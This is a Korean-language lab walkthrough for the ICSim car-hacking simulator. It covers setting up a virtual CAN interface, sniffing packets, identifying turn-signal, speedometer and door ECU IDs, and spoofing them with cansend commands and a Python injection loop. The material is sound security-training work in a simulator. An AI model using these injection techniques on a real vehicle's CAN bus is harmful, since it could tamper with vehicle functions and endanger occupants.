[Vehicle] 자동차 해킹 시뮬레이터 실습

설치

git clone https://github.com/zombieCraig/ICSim.git

sudo apt-get install can-utils
sudo apt-get install libsdl2-dev libsdl2-image-dev
sudo apt-get update — fix-missing

sudo modprobe can
sudo modprobe vcan

sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

cd ICSim
make all

다시 실행 vcan set up

sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

IC Simulator

./icsim vcan0

CANBus Control Panel 실행

./controls vcan0

can 패킷 확인

1. candump

candump vcan0

2. cansniffer

cansniffer -c vcan0

패킷 저장

candump -l vcan0

sudo cansniffer vcan0 > cansniffer_log.txt

//동일한 id끼리 
sudo cansniffer -c vcan0 | grep "특정_CAN_ID"1 > filtered_cansniffer_log.txt

분석

1. 시작될 때 반복되는 id

01|ms | ID  | data ...     < vcan0 # l=20 h=100 t=500 slots=32 >
00019 | 039 | 00 1B                   ..
00010 | 095 | 80 00 07 F4 00 00 00 26 .......&
00009 | 133 | 00 00 00 00 B6          .....
00009 | 136 | 00 02 00 00 00 00 00 39 .......9
00009 | 13A | 00 00 00 00 00 00 00 37 .......7
00009 | 13F | 00 00 00 05 00 00 00 3D .......=
00010 | 143 | 6B 6B 00 FF             kk..
00010 | 158 | 00 00 00 00 00 00 00 28 .......(
00010 | 161 | 00 00 05 50 01 08 00 2B ...P...+
00009 | 164 | 00 00 C0 1A A9 00 00 12 ........
00009 | 166 | D0 32 00 27             .2.'
00009 | 17C | 00 00 00 00 10 00 00 30 .......0

2. 동일한 id끼리 확인

cat cansniffer_log.txt |grep "| 특정id"

1) 188 - 방향 지시등 관련 ECU ID

02519 | 188 | 02 00 00 00             ....
00500 | 188 | 00 00 00 00             ....
00504 | 188 | 02 00 00 00             ....
00501 | 188 | 00 00 00 00             ....
00501 | 188 | 02 00 00 00             ....
00505 | 188 | 00 00 00 00             ....
00505 | 188 | 02 00 00 00             ....
00505 | 188 | 03 00 00 00             ....
00504 | 188 | 02 00 00 00             ....
00502 | 188 | 03 00 00 00             ....
00501 | 188 | 02 00 00 00             ....

2) 244 - 속도계 제어 관련 ECU ID

00015 | 244 | 00 00 00 01 52          ....R
00010 | 244 | 00 00 00 01 69          ....i
00016 | 244 | 00 00 00 01 FA          .....
00010 | 244 | 00 00 00 01 3D          ....=
00010 | 244 | 00 00 00 01 7F          .....
00015 | 244 | 00 00 00 01 F9          .....
00011 | 244 | 00 00 00 01 BA          .....
00011 | 244 | 00 00 00 01 39          ....9
00010 | 244 | 00 00 00 01 1B          .....
00010 | 244 | 00 00 00 01 4F          ....O
00015 | 244 | 00 00 00 01 74          ....t
00016 | 244 | 00 00 00 01 56          ....V
00011 | 244 | 00 00 00 01 75          ....u
00015 | 244 | 00 00 00 01 AE          .....
00010 | 244 | 00 00 00 01 43          ....C
00015 | 244 | 00 00 00 01 C3          .....
00010 | 244 | 00 00 00 01 DA          .....
00010 | 244 | 00 00 00 01 E6          .....
00016 | 244 | 00 00 00 01 32          ....2
00011 | 244 | 00 00 00 01 39          ....9

Spoofing

1. cansend code

1) 방향 지시등

cansend vcan0 188#00       //꺼짐
cansend vcan0 188#01       //왼쪽
cansend vcan0 188#02       //오른쪽
cansend vcan0 188#03       //양쪽

2) 속도 제어

cansend vcan0 244#0000000139
cansend vcan0 244#0000000fff

3) 문 열림 제어

cansend vcan0 19B#000000       //전부
cansend vcan0 19B#00000A       //왼쪽 앞뒤
cansend vcan0 19B#00000B       //왼쪽 뒤
cansend vcan0 19B#00000C       //앞
cansend vcan0 19B#00000D       //왼쪽 앞
cansend vcan0 19B#00000F       //꺼짐

2. spoofing python code

#!/usr/bin/env python
import can
import time

def send_spoofed_message(bus, arbitration_id, data):
    message = can.Message(arbitration_id=arbitration_id, data=data, is_extended_id=False)
    try:
        bus.send(message)
        print(f"Message sent on {bus.channel_info}")
    except can.CanError:
        print("Message NOT sent")

def main():
    bus = can.interface.Bus(channel='vcan0', bustype='socketcan')
    
    while True:
        send_spoofed_message(bus, 0x188, [0x01])
        time.sleep(0.1)

if __name__ == "__main__":
    main()